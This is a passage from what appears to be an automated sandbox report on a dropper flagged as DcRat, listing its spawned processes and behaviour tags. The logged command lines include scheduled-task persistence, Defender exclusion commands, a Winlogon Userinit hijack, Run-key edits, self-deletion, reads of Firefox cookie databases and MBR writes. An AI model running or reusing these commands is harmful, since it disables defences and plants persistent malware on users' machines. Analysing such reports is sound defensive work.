PID 1368 wrote to memory of 2124	1368	4363463463464363463463463.exe	tuc5.exe
PID 2124 wrote to memory of 3708	2124	tuc5.exe	tuc5.tmp
PID 2124 wrote to memory of 3708	2124	tuc5.exe	tuc5.tmp
PID 2124 wrote to memory of 3708	2124	tuc5.exe	tuc5.tmp
PID 3232 wrote to memory of 5016	3232		cmd.exe
PID 3232 wrote to memory of 5016	3232		cmd.exe
PID 3232 wrote to memory of 3468	3232		cmd.exe
PID 3232 wrote to memory of 3468	3232		cmd.exe
PID 5016 wrote to memory of 2612	5016	cmd.exe	reg.exe
PID 5016 wrote to memory of 2612	5016	cmd.exe	reg.exe
PID 3468 wrote to memory of 4924	3468	cmd.exe	reg.exe
PID 3468 wrote to memory of 4924	3468	cmd.exe	reg.exe
PID 3232 wrote to memory of 4684	3232		B3F6.exe
PID 3232 wrote to memory of 4684	3232		B3F6.exe
PID 3232 wrote to memory of 4684	3232		B3F6.exe
PID 1368 wrote to memory of 4648	1368	4363463463464363463463463.exe	VLTKBacdau.exe
PID 1368 wrote to memory of 4648	1368	4363463463464363463463463.exe	VLTKBacdau.exe
PID 1368 wrote to memory of 4648	1368	4363463463464363463463463.exe	VLTKBacdau.exe
PID 4684 wrote to memory of 1160	4684	B3F6.exe	B3F6.exe
PID 4684 wrote to memory of 1160	4684	B3F6.exe	B3F6.exe
PID 4684 wrote to memory of 1160	4684	B3F6.exe	B3F6.exe
PID 4684 wrote to memory of 1160	4684	B3F6.exe	B3F6.exe
PID 4684 wrote to memory of 1160	4684	B3F6.exe	B3F6.exe
PID 4684 wrote to memory of 1160	4684	B3F6.exe	B3F6.exe
PID 4684 wrote to memory of 1160	4684	B3F6.exe	B3F6.exe
PID 4684 wrote to memory of 1160	4684	B3F6.exe	B3F6.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- DcRat
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1368

C:\Users\Admin\AppData\Local\Temp\Files\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tuc3.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3624

C:\Users\Admin\AppData\Local\Temp\is-KTR07.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KTR07.tmp\tuc3.tmp" /SL5="$6010A,6760920,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc3.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4988

C:\Program Files (x86)\FlatControlSTD\fcontrolstd.exe
"C:\Program Files (x86)\FlatControlSTD\fcontrolstd.exe" -i
4⤵
- Executes dropped EXE
PID:4068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 436
5⤵
- Program crash
PID:3960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 444
5⤵
- Program crash
PID:5052

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 22
4⤵
- Suspicious use of WriteProcessMemory
PID:2812

C:\Program Files (x86)\FlatControlSTD\fcontrolstd.exe
"C:\Program Files (x86)\FlatControlSTD\fcontrolstd.exe" -s
4⤵
- Executes dropped EXE
PID:4428

C:\Users\Admin\AppData\Local\Temp\Files\4iBpiQUavIMb.exe
"C:\Users\Admin\AppData\Local\Temp\Files\4iBpiQUavIMb.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1936

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\Quase xab xewo jati hohoval palibega wocisec-yofoc joy somigowi verodedi mije\Tat tow roc koyor manax wodebib haninew dolixo.exe"
3⤵
- DcRat
- Creates scheduled task(s)
PID:4592

C:\Users\Admin\Quase xab xewo jati hohoval palibega wocisec-yofoc joy somigowi verodedi mije\Tat tow roc koyor manax wodebib haninew dolixo.exe
"C:\Users\Admin\Quase xab xewo jati hohoval palibega wocisec-yofoc joy somigowi verodedi mije\Tat tow roc koyor manax wodebib haninew dolixo.exe"
3⤵
- Executes dropped EXE
PID:2528

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"
4⤵
PID:1136

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Files\4iBpiQUavIMb.exe"
3⤵
PID:2780

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:4836

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:4408

C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2708

C:\Users\Admin\AppData\Local\Temp\is-6FU4T.tmp\tuc6.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6FU4T.tmp\tuc6.tmp" /SL5="$60208,6762740,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc6.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:2284

C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1808

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
3⤵
PID:3328

C:\Windows\SysWOW64\chcp.com
chcp 1251
4⤵
PID:4076

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4164

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost"
4⤵
PID:4368

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
4⤵
PID:2244

C:\Users\Admin\AppData\Local\Temp\Files\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\toolspub2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2008

C:\Users\Admin\AppData\Local\Temp\Files\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\toolspub2.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1056

C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2124

C:\Users\Admin\AppData\Local\Temp\is-ANAMP.tmp\tuc5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ANAMP.tmp\tuc5.tmp" /SL5="$6003E,6777858,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc5.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:3708

C:\Users\Admin\AppData\Local\Temp\Files\VLTKBacdau.exe
"C:\Users\Admin\AppData\Local\Temp\Files\VLTKBacdau.exe"
2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of AdjustPrivilegeToken
PID:4648

C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4172

C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
"C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2552

C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2876

C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
4⤵
- Executes dropped EXE
PID:1276

C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
3⤵
PID:1124

C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
3⤵
PID:3972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 448
4⤵
- Program crash
PID:2252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 480
4⤵
- Program crash
PID:1564

C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe"
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:3756

C:\Users\Admin\AppData\Local\Temp\Files\OSM-Client.exe
"C:\Users\Admin\AppData\Local\Temp\Files\OSM-Client.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3060

C:\Users\Admin\AppData\Local\Temp\Files\a3e34cb.exe
"C:\Users\Admin\AppData\Local\Temp\Files\a3e34cb.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:4316

C:\Users\Admin\AppData\Local\Temp\c2868ed41c\bstyoops.exe
"C:\Users\Admin\AppData\Local\Temp\c2868ed41c\bstyoops.exe"
3⤵
- Executes dropped EXE
PID:1880

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bstyoops.exe /TR "C:\Users\Admin\AppData\Local\Temp\c2868ed41c\bstyoops.exe" /F
4⤵
- DcRat
- Creates scheduled task(s)
PID:1048

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "bstyoops.exe" /P "Admin:N"&&CACLS "bstyoops.exe" /P "Admin:R" /E&&echo Y|CACLS "..\c2868ed41c" /P "Admin:N"&&CACLS "..\c2868ed41c" /P "Admin:R" /E&&Exit
4⤵
PID:404

C:\Windows\SysWOW64\cacls.exe
CACLS "bstyoops.exe" /P "Admin:N"
5⤵
PID:852

C:\Windows\SysWOW64\cacls.exe
CACLS "bstyoops.exe" /P "Admin:R" /E
5⤵
PID:2208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:2316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:2816

C:\Windows\SysWOW64\cacls.exe
CACLS "..\c2868ed41c" /P "Admin:N"
5⤵
PID:5104

C:\Windows\SysWOW64\cacls.exe
CACLS "..\c2868ed41c" /P "Admin:R" /E
5⤵
- Executes dropped EXE
PID:1124

C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
2⤵
PID:5020

C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
"C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"
3⤵
PID:4048

C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
4⤵
PID:4144

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
5⤵
PID:1572

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
6⤵
PID:236

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
5⤵
PID:4620

C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
3⤵
PID:2236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 476
4⤵
- Program crash
PID:1040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 484
4⤵
- Program crash
PID:3284

C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
3⤵
PID:1932

C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
3⤵
PID:3420

C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
3⤵
PID:4928

C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
2⤵
PID:2288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s1rk.0.bat" "
3⤵
PID:2168

C:\Windows\SysWOW64\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:936

C:\ProgramData\pinterests\XRJNZC.exe
"C:\ProgramData\pinterests\XRJNZC.exe"
4⤵
PID:5584

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /RL HIGHEST /tn "XRJNZC" /tr C:\ProgramData\pinterests\XRJNZC.exe /f
5⤵
- DcRat
- Creates scheduled task(s)
PID:6836

C:\Users\Admin\AppData\Local\Temp\Files\gpupdate.exe
"C:\Users\Admin\AppData\Local\Temp\Files\gpupdate.exe"
2⤵
PID:3228

C:\Users\Admin\AppData\Local\Temp\Files\cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe"
2⤵
PID:1428

C:\Users\Admin\AppData\Local\Temp\Files\idrB5Event.exe
"C:\Users\Admin\AppData\Local\Temp\Files\idrB5Event.exe"
2⤵
PID:1484

C:\Users\Admin\AppData\Local\Temp\Files\BelgiumchainAGRO.exe
"C:\Users\Admin\AppData\Local\Temp\Files\BelgiumchainAGRO.exe"
2⤵
PID:4064

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
3⤵
PID:5776

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'BelgiumchainAGRO';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'BelgiumchainAGRO' -Value '"C:\Users\Admin\AppData\Local\BelgiumchainAGRO\BelgiumchainAGRO.exe"' -PropertyType 'String'
3⤵
PID:6652

C:\Users\Admin\AppData\Local\Temp\Files\brg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\brg.exe"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:3972

C:\Users\Admin\AppData\Local\Temp\Files\Temp3.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Temp3.exe"
2⤵
PID:3244

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Temp3.exe" /rl HIGHEST /f
3⤵
- DcRat
- Creates scheduled task(s)
PID:6068

C:\Windows\SysWOW64\SubDir\Windows Security Client.exe
"C:\Windows\SysWOW64\SubDir\Windows Security Client.exe"
3⤵
PID:6336

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\Windows Security Client.exe" /rl HIGHEST /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:4196

C:\Users\Admin\AppData\Local\Temp\Files\b5ed26bd6f40eda4ff90ec9b4a60b295c77a723d38ebebb0c70997caedc6fb8c.exe
"C:\Users\Admin\AppData\Local\Temp\Files\b5ed26bd6f40eda4ff90ec9b4a60b295c77a723d38ebebb0c70997caedc6fb8c.exe"
2⤵
PID:696

C:\Users\Admin\AppData\Local\Temp\Files\Restoro.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Restoro.exe"
2⤵
PID:1340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FF.bat" > C:\Users\Admin\AppData\Local\Temp\FF.txt"
3⤵
PID:4192

C:\Users\Admin\AppData\Local\Temp\sqlite3.exe
"C:\Users\Admin\AppData\Local\Temp\sqlite3.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kk1png5y.Admin\cookies.sqlite" "select value, expiry from moz_cookies where baseDomain like 'restoro.com' and name='_trackid_product_24';"
4⤵
PID:4600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FF.bat" > C:\Users\Admin\AppData\Local\Temp\FF.txt"
3⤵
PID:6128

C:\Users\Admin\AppData\Local\Temp\sqlite3.exe
"C:\Users\Admin\AppData\Local\Temp\sqlite3.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kk1png5y.Admin\cookies.sqlite" "select value, expiry from moz_cookies where baseDomain like 'restoro.com' and name='_tracking_product_24';"
4⤵
PID:6380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FF.bat" > C:\Users\Admin\AppData\Local\Temp\FF.txt"
3⤵
PID:7056

C:\Users\Admin\AppData\Local\Temp\sqlite3.exe
"C:\Users\Admin\AppData\Local\Temp\sqlite3.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kk1png5y.Admin\cookies.sqlite" "select value, expiry from moz_cookies where baseDomain like 'restoro.com' and name='_campaign_product_24';"
4⤵
PID:6028

C:\Windows\SysWOW64\cmd.exe
cmd /C tasklist /FI "IMAGENAME eq RestoroMain.exe" > C:\Users\Admin\AppData\Local\Temp\IsProcessActive.txt
3⤵
PID:2652

C:\Windows\SysWOW64\cmd.exe
cmd /C tasklist /FI "IMAGENAME eq avupdate.exe" > C:\Users\Admin\AppData\Local\Temp\IsProcessActive.txt
3⤵
PID:5168

C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe
"C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"
2⤵
PID:2456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 1292
3⤵
- Program crash
PID:3584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 1292
3⤵
- Program crash
PID:6676

C:\Users\Admin\AppData\Local\Temp\Files\32.exe
"C:\Users\Admin\AppData\Local\Temp\Files\32.exe"
2⤵
PID:1616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 284
3⤵
- Program crash
PID:824

C:\Users\Admin\AppData\Local\Temp\Files\autorun.exe
"C:\Users\Admin\AppData\Local\Temp\Files\autorun.exe"
2⤵
PID:4632

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
4⤵
PID:2080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ffd08823cb8,0x7ffd08823cc8,0x7ffd08823cd8
5⤵
PID:4596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,1503386320431795165,8213911428901399214,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2056 /prefetch:2
5⤵
PID:3604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,1503386320431795165,8213911428901399214,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2420 /prefetch:8
5⤵
PID:6840

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,1503386320431795165,8213911428901399214,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 /prefetch:3
5⤵
PID:1400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,1503386320431795165,8213911428901399214,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
5⤵
PID:4312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,1503386320431795165,8213911428901399214,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
5⤵
PID:2584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,1503386320431795165,8213911428901399214,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:1
5⤵
PID:5696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,1503386320431795165,8213911428901399214,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
5⤵
PID:4500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1988,1503386320431795165,8213911428901399214,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
5⤵
PID:5396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,1503386320431795165,8213911428901399214,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5084 /prefetch:1
5⤵
PID:4028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,1503386320431795165,8213911428901399214,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4472 /prefetch:1
5⤵
PID:6748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,1503386320431795165,8213911428901399214,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4456 /prefetch:1
5⤵
PID:3308

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,1503386320431795165,8213911428901399214,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3864 /prefetch:8
5⤵
PID:5936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,1503386320431795165,8213911428901399214,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4804 /prefetch:2
5⤵
PID:6808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4632 -s 896
3⤵
- Program crash
PID:5284

C:\Users\Admin\AppData\Local\Temp\Files\Winlock.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Winlock.exe"
2⤵
PID:5248

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /V/K reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Bbm33bf3a3ibybW3Qb7bE3ibKb.exe" /f
3⤵
PID:4628

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Bbm33bf3a3ibybW3Qb7bE3ibKb.exe" /f
4⤵
PID:7048

C:\Users\Admin\AppData\Local\Temp\Files\amd.exe
"C:\Users\Admin\AppData\Local\Temp\Files\amd.exe"
2⤵
PID:6324

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
"C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe"
3⤵
PID:5180

C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe"
2⤵
PID:7124

C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe
"C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe"
2⤵
PID:3612

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
